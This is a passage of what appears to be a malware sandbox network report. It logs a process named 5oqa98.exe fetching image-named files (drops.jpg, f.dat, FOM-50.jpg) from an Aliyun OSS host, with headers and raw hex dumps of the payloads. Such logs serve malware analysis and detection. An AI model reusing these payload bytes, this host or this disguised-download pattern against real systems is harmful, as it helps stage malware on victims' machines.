                                                    Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy|9_;]:^8)'@/Ysq$hQ=2[C
                                                    2025-01-06 03:43:46 UTC651INData Raw: d6 f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84
                                                    Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji|}~


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.949981118.178.60.94437688C:\Users\user\Documents\5oqa98.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-06 03:44:00 UTC114OUTGET /drops.jpg HTTP/1.1
                                                    User-Agent: GetData
                                                    Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                    Cache-Control: no-cache
                                                    2025-01-06 03:44:00 UTC545INHTTP/1.1 200 OK
                                                    Server: AliyunOSS
                                                    Date: Mon, 06 Jan 2025 03:44:00 GMT
                                                    Content-Type: image/jpeg
                                                    Content-Length: 37274
                                                    Connection: close
                                                    x-oss-request-id: 677B518053BCC63338CE75CC
                                                    Accept-Ranges: bytes
                                                    ETag: "6D4DEB9526F3973DE0F9DCE9392F8EA7"
                                                    Last-Modified: Wed, 23 Oct 2024 04:47:27 GMT
                                                    x-oss-object-type: Normal
                                                    x-oss-hash-crc64ecma: 9193697774326766004
                                                    x-oss-storage-class: Standard
                                                    x-oss-ec: 0048-00000105
                                                    Content-Disposition: attachment
                                                    x-oss-force-download: true
                                                    Content-MD5: bU3rlSbzlz3g+dzpOS+Opw==
                                                    x-oss-server-time: 6
                                                    2025-01-06 03:44:00 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 9d 0b f8 6e e5 94 c0 97 91 14 26 45 21 4a 7f 25 4d 17 94 22 b9 cc 39 85 12 8d 90 2e 22 a7 9b 88 48 11 a9 4c 87 92 90 a4 d1 4c 49 3a 88 29 a1 90 4b 37 c2 14 21 83 34 51 f8 1f f7 7b ee cc 64 cc cc fe b5 ff 5b df f9 e6 fb fe df 5a 7b bf b7 ef db eb f7 3c eb 79 3c 39 ff 6f af fd ee 77 af fd be eb 5d 17 11 c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 cc 1a 95 ac 33 25 b2 46 a4 31 70 9c de 72 44 25 ff 3b 25 72 44 a4 31 70 9c de e2 06 c0 71 7a 8c 1b 00 c7 e9 31
                                                    Data Ascii: PNGIHDR\rfpHYs IDATxn&E!J%M"9."HLLI:)K7!4Q{d[Z{<y<9ow]qqqqqqqqqqqqqqqqq3%F1prD%;%rD1pqz1
                                                    2025-01-06 03:44:00 UTC4096INData Raw: b8 15 4d f0 da 0b 73 29 d8 06 f6 9f 9a 49 70 40 2e 05 0b 01 87 5f 9b 3d 3f fb 46 f6 f7 6d f6 f6 a1 c1 89 8a 9f a0 4d d0 15 3e 81 52 1c 83 39 a1 dc d8 a4 b1 fa 64 36 ed 8c e0 b1 d4 38 8c b0 7a eb 66 d2 b1 04 38 ea 6b e3 ed c7 43 bf 5d 06 7d 27 41 5d 01 4b 93 95 46 38 1d 28 e9 88 30 07 7c dd 35 db 80 d2 93 d3 6e 43 db 93 ed f2 5c 0a 16 82 a5 2d 59 23 ef 97 b2 7d 26 78 b5 3f 28 f6 fb 7a 57 0e 65 0b 82 17 5b 53 7b f0 79 b9 14 b4 a0 ad c2 72 68 2e 05 0b e0 b9 62 7f 49 e8 29 37 0d b5 09 f0 0d d0 e7 ce 7a 7f 7d df 0e 5e 2d 93 c7 e8 b2 6c da 29 21 c0 42 13 40 32 75 5e cd 80 10 db 6f e9 43 c0 76 ea a8 2c 9a 76 83 c0 2a 4b ec 00 01 61 a5 e5 0e a4 84 90 df 49 63 c4 b6 79 52 ad 81 ac 68 3b ec 7c 36 97 82 05 40 a5 18 cb 97 71 1a 5f fe 06 8c 80 e5 5e 2f cd a3 66 11 cc
                                                    Data Ascii: Ms)Ip@._=?FmM>R9d68zf8kC]}'A]KF8(0|5nC\-Y#}&x?(zWe[S{yrh.bI)7z}^-l)!B@2u^oCv,v*KaIcyRh;|6@q_^/f
                                                    2025-01-06 03:44:00 UTC4096INData Raw: d0 62 92 23 02 8f d8 7f 4b bb b9 f3 33 e8 e8 18 58 21 b6 49 77 40 06 1d 49 05 fd 8a 51 4f 8d b0 a7 bd 48 ea b2 d6 31 a1 a4 5b a8 ba 8e 83 f2 1b b1 75 d9 0d 05 45 38 2d 4d 44 3c 3c bc 50 38 4a b3 4c b8 f7 e5 51 53 4e 37 e8 d8 46 62 27 2f 59 92 6b ac 92 2b 02 ef 30 83 8e 18 8b 99 af dc 3b 6d 6c 22 f5 17 44 fb 10 73 ed e7 ac f9 08 7d 33 00 48 ae 08 bc 8b 0c 3a d2 fd b7 34 1f 4c 6f a1 21 c4 e7 45 ff f0 08 f5 dd 21 83 9e d6 7c 84 be 1a 80 5c 11 78 d6 50 e1 7f ce a0 a3 33 82 53 c5 36 c1 5e 9e 41 47 1c 74 57 18 f5 ec ab 01 40 7e 5a c9 7d 22 df c7 28 1e 2b b6 c8 d1 7d 32 e8 e8 0c f0 64 b1 2d a9 2f 93 3c 51 5d c7 19 74 ec da 9c 72 16 0c 00 42 6f be 1c 11 91 96 f6 75 d4 1d dc 28 83 8e 8e d4 c7 50 3f 13 db a4 3a 53 d2 3b 99 c8 2c fc b3 41 c7 fd a5 3e 9a c4 68 7c d5
                                                    Data Ascii: b#K3X!Iw@IQOH1[uE8-MD<<P8JLQSN7Fb'/Yk+0;ml"Ds}3H:4Lo!E!|\xP3S6^AGtW@~Z}"(+}2d-/<Q]trBou(P?:S;,A>h|
                                                    2025-01-06 03:44:00 UTC4096INData Raw: 72 b8 f8 65 fd f3 08 c8 16 67 54 0d cf 0b 6c 41 02 c8 a0 55 06 c4 14 75 72 5c ea 55 d3 97 57 dd f2 5b 5c 5d 16 d4 24 45 4a 6c da 65 e3 a7 67 ed f2 6b 6c 6d 26 e4 34 55 52 7c ca 75 f5 8f 39 05 67 33 f7 39 5a 5f 8f 3f 82 00 7c df f9 97 c0 02 ce af ac 82 30 8f 13 59 b2 1a 90 b1 7d 9c d0 12 de bf bc 92 20 9f 29 a5 86 eb 2f e1 82 8f a7 17 aa 28 54 ec d2 b1 f8 3a f6 97 9c ba 08 b7 3b 41 e0 c4 ad f5 35 fb e4 e9 cd 7d c4 46 0e e7 41 8d ee cf 27 c1 86 44 94 f5 fa dc 6a d5 5f 93 fc dd d5 6d d8 f9 d1 69 ac c5 e6 d8 25 90 f9 af 63 ad ce cb a4 12 2e a7 79 b5 d6 d3 bc 7e b2 d3 d0 b1 05 3b b4 74 ba db 28 e8 4a fc fb fa 4e 8c 4c 2d 2a 04 b2 0d 8d f7 51 6d 0c 5b 9f 51 32 37 17 a7 1a 98 e4 47 61 0e 68 aa 66 07 04 2a 98 27 ab e1 0a a2 68 09 26 c4 3c 79 b9 77 10 15 39 89 38
                                                    Data Ascii: regTlAUur\UW[\]$EJlegklm&4UR|u9g39Z_?|0Y} )/(T:;A5}FA'Dj_mi%c.y~;t(JNL-*Qm[Q27Gahf*'h&<yw98
                                                    2025-01-06 03:44:00 UTC4096INData Raw: 8a 3b 3c 3d ae 77 c1 85 4a 42 44 45 85 8b 84 85 86 87 80 81 82 83 18 d0 be db 56 55 56 91 1c 7d 2a 68 9a 19 7a 2e 56 a7 26 47 16 55 a0 23 4c 1a 1e ad 28 49 1a 1d b6 35 56 06 15 b3 32 53 0e 00 bc 3f 58 0a 50 b9 c4 a5 fa e6 42 c1 a2 fe f0 4f ce af f6 e8 48 cb b4 ea 92 55 d0 b1 d6 a4 5e dd be da aa 5b da bb e2 91 64 e7 80 e6 d5 61 ec 8d ee cf 6a e9 8a ea 9e 77 f6 97 f2 d0 70 f3 9c fe c2 7d f8 99 f6 da 06 85 e6 8a c4 03 42 e3 48 c9 ca cb ff 0b 4a eb 51 d1 d2 d3 e2 13 52 f3 5a d9 da db ec 1b 5a fb 63 e1 e2 e3 97 23 62 c3 6c e9 ea eb 8d 2b 6a cb 75 f1 f2 f3 92 33 72 d3 7e f9 fa fb 99 3b 7a db 87 01 02 03 2a c3 82 23 80 09 0a 0b 69 cb 8a 2b 99 11 12 13 6c d3 92 33 92 19 1a 1b 79 db 9a 3b ab 21 22 23 24 e3 62 03 08 42 ec 6f 08 0c 4b e9 74 15 10 41 f2 71 12 14 56
                                                    Data Ascii: ;<=wJBDEVUV}*hz.V&GU#L(I5V2S?XPBOHU^[dajwp}BHJQRZZc#bl+ju3r~;z*#i+l3y;!"#$bBoKtAqV
                                                    2025-01-06 03:44:00 UTC4096INData Raw: 3e 1f 74 b6 72 1b 60 09 41 8b 0c ce 87 0f c3 45 6e 03 c7 19 6a 67 18 52 83 1b df 9f 59 e1 51 d1 52 b0 f0 15 d5 5b 44 29 e9 2f 40 45 2e 64 a0 21 e1 aa aa 6d 6e 27 fb 35 56 53 3c f6 b2 6f bb b5 b6 b7 b0 b1 b2 b3 c8 08 d6 a7 94 cd 0f cb ac 81 c2 08 60 95 c6 04 d4 b5 b2 db 1d 91 b2 df 13 dd be b3 d4 14 da bb a8 e9 29 a7 80 aa 18 a7 2d 69 de a6 e4 26 aa 8b f8 4e 72 fb 3d b1 92 5c 50 f1 31 bf 98 f5 35 f3 e4 c9 cd 75 cd 4d ce 8f 43 cd ee 83 33 0d 86 46 d4 f5 9a 58 90 f1 de 9f 27 19 92 52 98 f9 d6 97 6b a5 c6 eb eb 5b e6 62 28 9c 24 a3 67 e9 ca 29 f0 f1 ba 78 b0 d1 d6 bf 7b 3d e2 38 30 31 32 33 44 88 46 27 1c 4d 8f 53 2c 19 42 82 40 29 06 47 93 fd 3a 5b 9f 51 32 2f 50 90 5e 3f 0c 55 95 5b 04 11 6a aa 60 01 2e ac 6c 0d 6a a2 28 09 a5 6b 14 71 cd fb bd 71 12 77 bb
                                                    Data Ascii: >tr`AEnjgRYQR[D)/@E.d!mn'5VS<o`)-i&Nr=\P15uMC3FX'Rk[b($g)x{=80123DF'MS,B@)G:[Q2/P^?U[j`.lj(kqqw
                                                    2025-01-06 03:44:00 UTC4096INData Raw: 1e 63 74 b0 aa 1b c8 41 42 43 0c c8 4b e2 8d b6 b5 a3 1c 82 b1 b0 18 d8 16 77 34 1d 91 13 7c 69 5a 5b 5c 5d 99 1b 44 49 e2 63 64 65 a1 23 4c 49 68 6b 6c 6d 2b 5c b9 34 41 b3 ce 75 76 77 38 31 f1 f7 58 cd 7e 7f 80 7e d6 a7 d4 cd 0f c3 ac c1 c2 08 f0 a9 c6 70 e4 a0 da 54 d0 b1 b6 97 98 99 9a d7 11 d1 ba df e4 2a 26 87 64 a5 a6 a7 e0 22 3e 8f 14 ad ae af f8 3a fe 97 fc 4a e2 93 e0 f1 31 f7 98 f5 41 eb e4 a1 52 8b 45 01 6e c7 c8 c9 09 07 00 01 02 03 98 58 9e f7 dc 9d 55 3b f0 91 51 9f f8 ed 96 56 a4 c5 f2 ab 23 e1 c2 18 17 16 15 a3 13 e9 ca a7 7b b5 d6 e3 bc 7e fa d3 78 c5 f2 fb 89 10 b6 74 04 25 4a 8a 40 21 0e 4f 8b 75 2e 03 0c 78 0c e4 3d 59 99 57 30 1d 5e 9c 54 3d 2a 53 1f d5 56 94 e1 2e 9c 63 db a6 de 7b 5d 3d 62 a0 68 09 26 67 bb 7d 16 03 7c 36 fe 7f b3
                                                    Data Ascii: ctABCKw4|iZ[\]DIcde#LIhklm+\4Auvw81X~~pT*&d">:J1AREnXU;QV#{~xt%J@!Ou.x=YW0^T=*SV.c{]=bh&g}|6
                                                    2025-01-06 03:44:00 UTC4096INData Raw: 1e 03 74 be fe 27 01 f9 46 43 44 45 0e cc 98 01 c7 c7 68 a5 4e 4f 50 b9 f8 b3 ab aa 1e dc 1c 7d 62 13 df 9d 42 1e d8 69 62 63 64 2d ed b7 20 e2 e6 4f 7c 6c 6e 6f 98 fa 92 8c 8b 3d fd f3 5c 19 7b 7b 7c 35 f5 f3 a4 c9 83 83 84 cd 0f 8f c0 02 0e af ec 8c 8e 8f 1b 1d b6 77 94 95 96 1e d0 91 d2 10 18 b9 fe 9e a0 a1 ea 28 28 81 a6 a6 a8 a9 e2 22 e4 bd e6 24 34 95 d2 b2 b4 b5 3d 3b 9c 51 ba bb bc 34 f6 a7 88 4a 46 e7 a4 c4 c6 c7 80 42 46 ef dc cc ce cf 98 58 9a f3 9c 5e 52 f3 b8 d8 da db 94 5c 1a 87 e1 e1 e2 20 28 29 2a 2b 24 25 26 27 20 21 22 23 b8 78 be d7 fc bd 7d b3 dc f1 b2 70 fc b5 3f 1f 15 49 89 4f 20 0d 4e 8c 01 41 39 c3 44 86 cf 47 9b 5d 36 1b 5c 9c 17 5f 93 5d 3e 13 54 96 1e 57 e1 c9 01 6b af 69 02 2f 60 a2 23 63 1f e5 66 a4 f1 79 b9 7f 10 3d 7e be 39
                                                    Data Ascii: t'FCDEhNOP}bBibcd- O|lno=\{{|5w(("$4=;Q4JFBFX^R\ ()*+$%&' !"#x}p?IO NA9DG]6\_]>TWki/`#cfy=~9
                                                    2025-01-06 03:44:00 UTC4096INData Raw: 3a 5e fa b9 1a 89 40 41 42 20 82 c1 62 f0 48 49 4a 3f 8a c9 6a f7 50 51 52 3c 92 d1 72 ee 58 59 5a 29 9a d9 7a e5 60 61 62 1a a2 e1 42 dc 68 69 6a 2a aa e9 4a d3 70 71 72 73 3c f8 e2 53 d0 79 7a 7b 34 f0 73 12 25 7e 7d 6b 9c 2a 79 78 c0 00 0e af a4 8f 8e 8f d8 1c 1e b7 c4 a7 96 97 67 0d be b3 9e 9d 9e d7 2d 2d 86 ff 91 a5 a6 4f 1c a4 aa ab e4 20 22 8b d0 87 b2 b3 5c 12 bb b7 b8 f1 37 37 98 d9 89 bf c0 29 58 ce c4 c5 8e 4a 44 ed a2 f3 cc cd 26 42 dd d1 d2 9b 59 59 f2 8b ed d9 da 33 2c d4 de df 26 65 c6 63 e4 e5 e6 a0 2e 6d ce 6a ec ed ee 8a 36 75 d6 71 f4 f5 f6 83 3e 7d de 78 fc fd fe af c6 85 26 87 04 05 06 75 ce 8d 2e 8e 0c 0d 0e 60 d6 95 36 95 14 15 16 74 de 9d 3e 9c 1c 1d 1e 7a e6 a5 06 ab 24 25 26 54 ee ad 0e a2 2c 2d 2e 5c f6 b5 16 b9 34 35 36 7f fe
                                                    Data Ascii: :^@AB bHIJ?jPQR<rXYZ)z`abBhij*Jpqrs<Syz{4s%~}k*yxg--O "\77)XJD&BYY3,&ec.mj6uq>}x&u.`6t>z$%&T,-.\456
                                                    2025-01-06 03:44:00 UTC955INData Raw: 66 1f 34 70 0d e4 0c cc 16 67 5c 09 6d 97 05 46 08 98 29 01 c5 53 75 41 52 53 54 18 6d 84 2b 4f 3c 1a dd bf 5e af 2d ec f9 63 94 9a 99 26 ae 6a 6a 26 57 be 1b 9f 3c fa 66 57 38 fe 2a 53 70 31 f9 bf 6c be b2 b3 81 86 80 83 83 84 af 87 89 80 8b 8b 85 af 8e 8f 91 9c 93 93 99 d7 96 97 99 94 9b 9b 91 5f 9e 9f a1 ab a1 a3 ae 67 a0 d7 ad c9 aa ab ad a3 af af be 13 b2 b3 b5 bb b7 b7 b6 9b ba bb bd b1 bc bf cc c0 ff c3 c5 c2 c4 c7 cf c8 dd cb cd c4 cf cf d9 13 d2 d3 d5 d1 d7 d7 dc 3b da db dd d9 df df e4 23 e2 e3 e5 ee e4 e7 e3 e8 cb eb ed ea ec ef f7 f0 a3 f3 f5 e4 f4 f7 e9 f8 df fb fd f0 ff ff 0d 63 02 03 05 02 04 07 0f 08 21 0b 0d 09 0f 0f 14 b3 12 13 15 06 17 17 0b 3b 1a 1b 1d 0e 1f 1f 33 63 22 23 25 2b 27 27 26 6b 2a 2b 2d 23 2f 2f 3e 53 32 33 35 2d 37 37 20
                                                    Data Ascii: f4pg\mF)SuARSTm+O<^-c&jj&W<fW8*Sp1l_g;#c!;3c"#%+''&k*+-#//>S235-77


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.949982118.178.60.94437688C:\Users\user\Documents\5oqa98.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-06 03:44:04 UTC110OUTGET /f.dat HTTP/1.1
                                                    User-Agent: GetData
                                                    Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                    Cache-Control: no-cache
                                                    2025-01-06 03:44:04 UTC558INHTTP/1.1 200 OK
                                                    Server: AliyunOSS
                                                    Date: Mon, 06 Jan 2025 03:44:04 GMT
                                                    Content-Type: application/octet-stream
                                                    Content-Length: 879
                                                    Connection: close
                                                    x-oss-request-id: 677B51847CF84234349AF79F
                                                    Accept-Ranges: bytes
                                                    ETag: "E54C4296F011EC91D935AA353C936E34"
                                                    Last-Modified: Tue, 22 Oct 2024 18:02:54 GMT
                                                    x-oss-object-type: Normal
                                                    x-oss-hash-crc64ecma: 11142793972884948456
                                                    x-oss-storage-class: Standard
                                                    x-oss-ec: 0048-00000113
                                                    Content-Disposition: attachment
                                                    x-oss-force-download: true
                                                    Content-MD5: 5UxClvAR7JHZNao1PJNuNA==
                                                    x-oss-server-time: 7
                                                    2025-01-06 03:44:04 UTC879INData Raw: 0f 56 0e 57 66 34 65 31 31 31 31 31 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31
                                                    Data Ascii: VWf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW111


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.949983118.178.60.94437688C:\Users\user\Documents\5oqa98.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-06 03:44:05 UTC115OUTGET /FOM-50.jpg HTTP/1.1
                                                    User-Agent: GetData
                                                    Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                    Cache-Control: no-cache
                                                    2025-01-06 03:44:06 UTC546INHTTP/1.1 200 OK
                                                    Server: AliyunOSS
                                                    Date: Mon, 06 Jan 2025 03:44:06 GMT
                                                    Content-Type: image/jpeg
                                                    Content-Length: 55085
                                                    Connection: close
                                                    x-oss-request-id: 677B518694C77F3736000671
                                                    Accept-Ranges: bytes
                                                    ETag: "DC44AE348E6A74B3A74871020FDFAC74"
                                                    Last-Modified: Tue, 22 Oct 2024 14:47:46 GMT
                                                    x-oss-object-type: Normal
                                                    x-oss-hash-crc64ecma: 12339968747348072397
                                                    x-oss-storage-class: Standard
                                                    x-oss-ec: 0048-00000105
                                                    Content-Disposition: attachment
                                                    x-oss-force-download: true
                                                    Content-MD5: 3ESuNI5qdLOnSHECD9+sdA==
                                                    x-oss-server-time: 9
                                                    2025-01-06 03:44:06 UTC3550INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                    Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                    2025-01-06 03:44:06 UTC4096INData Raw: 7c 7b dc 41 c2 74 77 75 74 73 65 91 8f 90 91 11 ee 84 95 e3 bf 11 84 3e 34 dc 9d f4 97 48 c7 b1 a3 a4 fc 59 d2 a0 41 56 56 53 52 9d 74 f3 32 cf a3 b4 c1 be dd b0 51 f7 a8 bc bd e7 7c 28 d0 d2 c3 c4 06 4d 38 9d 42 26 a1 cc a7 ce 30 a5 d9 3a 10 2a 2a 29 54 1c d5 87 18 57 22 8b 54 0c 8b e2 89 e5 1a 93 ef 00 44 14 14 13 6e 2a e3 ad 32 98 f2 9e f5 9c f7 10 64 04 04 03 7e 3a f3 c3 6b 03 69 05 6f 06 ef 86 f7 f5 f4 8f c9 02 cc 9b ee 44 fb 09 1f 16 17 93 e9 4c f3 1d 06 1e 1f 76 c9 ae 39 24 25 70 cf c4 3a 2a 2b 7a c5 5f 35 30 31 64 db 68 2f 36 37 6e d1 7e 23 3c 3d 68 d7 be 40 42 43 12 ad 48 55 48 49 22 dc 5a 0d 4e a7 3f 58 52 53 d7 91 72 f4 54 f9 1a 5b 02 9e d5 a0 35 ea 8e 32 35 36 ed 3a 60 3f 3d 58 9a 5e 91 e6 0d 8d 49 6f 89 65 d6 37 78 0d 73 3c f5 00 82 fc 7f 96
                                                    Data Ascii: |{Atwutse>4HYAVVSRt2Q|(M8B&0:**)TW"TDn*2d~:kioDLv9$%p:*+z_501dh/67n~#<=h@BCHUHI"ZN?XRSrT[5256:`?=X^Ioe7xs<
                                                    2025-01-06 03:44:06 UTC4096INData Raw: 81 d9 46 b5 47 c8 2a 32 3c cc 8d d3 4c 5c f9 22 b5 d4 95 f2 68 ad 99 9a 9b 9c 16 da bb b0 28 ce 87 b4 28 ca 83 b8 82 4a f8 fa fa 0f ab 10 f1 b2 82 f1 49 85 72 e8 30 df 53 43 c8 46 34 85 3d 05 86 38 3b 39 38 37 40 8f 33 41 88 3e ab 73 d1 d2 d3 d4 16 5d 9a 28 bd 53 d6 dc dd de df b9 be bd bd bf 6e 03 ba b9 2a 26 27 20 21 22 23 3c 3d 3e 3f 38 7e 09 a2 73 15 79 17 e4 ae 75 a2 0c 57 89 70 0c 36 33 03 a8 49 0a 5c 87 0b c8 4a ef 11 d5 56 e0 14 16 17 18 94 61 0b 9f e5 e0 6b 2d aa 6c 27 27 ea 15 2b 10 c1 c9 c2 d3 d2 a5 61 3c ba 74 3b 37 fa 05 3b 00 d1 e9 d2 c3 c2 b5 7a 48 b7 02 47 22 4a c3 51 49 49 4a c0 01 5d c3 1a b8 d8 01 af df 0e 5a de 1d b1 d3 16 b0 de a5 a1 14 3e ef 2a 64 e8 62 3c e3 25 ec 7f e1 29 e8 7f f9 34 82 f8 74 fc 33 8f fd b0 0e 6f f7 aa 96 23 aa 81
                                                    Data Ascii: FG*2<L\"h((JIr0SCF4=8;987@3A>s](Sn*&' !"#<=>?8~syuWp63I\JVak-l''+a<t;7;zHG"JQIIJ]Z>*db<%)4t3o#
                                                    2025-01-06 03:44:06 UTC4096INData Raw: b4 7b f0 8e 6c 82 e3 8e 63 f7 7e 71 70 c9 52 c4 f9 94 6a a3 4b 2c d9 9a 64 89 3d 1e df a0 24 62 d6 b2 4d ab 51 57 56 21 5b 53 b8 a6 2f f0 b1 e2 5b 09 40 49 48 31 bf e3 53 aa 4d 41 40 03 4a 3d 96 4f 29 4d 92 c0 9a 9c 9c ff 32 f5 18 a4 d6 59 8e d8 ee 09 a0 c6 31 03 2e 23 22 b4 c9 be 68 d2 b4 b3 b2 b1 b0 00 8b 1f 14 13 6e 2a fb 7b 37 ad ad af a8 35 7c 8d e9 c1 0c 89 fa cd 3f 66 88 00 e8 d0 8e cc 08 bf 0f 6c 82 0d 4c 4f 49 56 77 29 d4 60 16 5d 62 f6 2a da 20 c3 68 cd 79 a9 23 ca b3 d1 da d9 4d 0a 70 a3 23 a7 dc c5 9c bb ce 67 b8 d8 63 61 04 ce c6 4f 33 d4 84 23 3f 40 ca ba 1a c1 ba 33 60 71 4c 36 fd 0c 4d 38 50 06 ae 47 1f d4 15 56 da de b1 59 5b 5c 66 5b 23 d6 21 62 15 67 e6 ae 98 e3 99 e9 93 93 18 a4 e4 b7 2e 2c 2e b7 fe 89 22 f3 95 2c 2c 4f 8b 14 7f 7f f4
                                                    Data Ascii: {lc~qpRjK,d=$bMQWV![S/[@IH1SMA@J=O)M2Y1.#"hn*{75|?flLOIVw)`]b* hy#Mp#gcaO3#?@3`qL6M8PGVY[\f[#!bg.,.",,O
                                                    2025-01-06 03:44:06 UTC4096INData Raw: 82 84 85 0f ca 78 02 84 c2 05 c0 72 79 51 90 9d 16 47 97 96 97 cb 14 86 aa 17 8e 17 ca 54 2a f4 5f 2d f0 5e 2c fd 5d 23 f6 a0 5b 6c ae c5 c5 73 49 b0 ff 35 4d 87 cf b9 d1 83 e7 35 f4 c4 fa 89 cb b1 87 7d c7 c8 c9 4a 48 36 ed bd d6 5b 1b 01 38 59 99 d4 d3 2f 0a fb 87 64 99 20 d6 95 c2 69 ae ec c4 ff 0c f4 64 a0 0b 3f 06 63 a3 f2 f5 05 20 d5 69 4e 33 f8 f9 fa 05 f5 88 f8 74 4d 09 23 5a 00 8e 5b 0b 83 5a 02 80 57 09 85 42 ec 12 5f e7 9d 4f 12 9c 4d 15 91 41 18 96 4c 17 a9 72 2a aa 69 d9 ad f6 e9 d3 2e 61 af d7 11 59 33 5b 0d 69 bf 68 ce b4 db 38 b3 66 c8 32 bb b0 40 41 42 68 31 bd cd 1a b0 88 b1 4f 26 72 c7 3a 5c 1a 0c 68 8a 23 54 dc 86 5a 17 a3 d7 8c 9f a5 64 2b eb 2e 98 5e b0 11 6a e2 bc 50 b6 19 30 e4 3d 7d f9 02 70 4e 07 7f 0d 42 c4 7b 7c 7d fe fc 7b a1
                                                    Data Ascii: xryQGT*_-^,]#[lsI5M5}JH6[8Y/d id?c iN3tM#Z[ZWB_OMALr*i.aY3[ih8f2@ABh1O&r:\h#TZd+.^jP0=}pNB{|}{
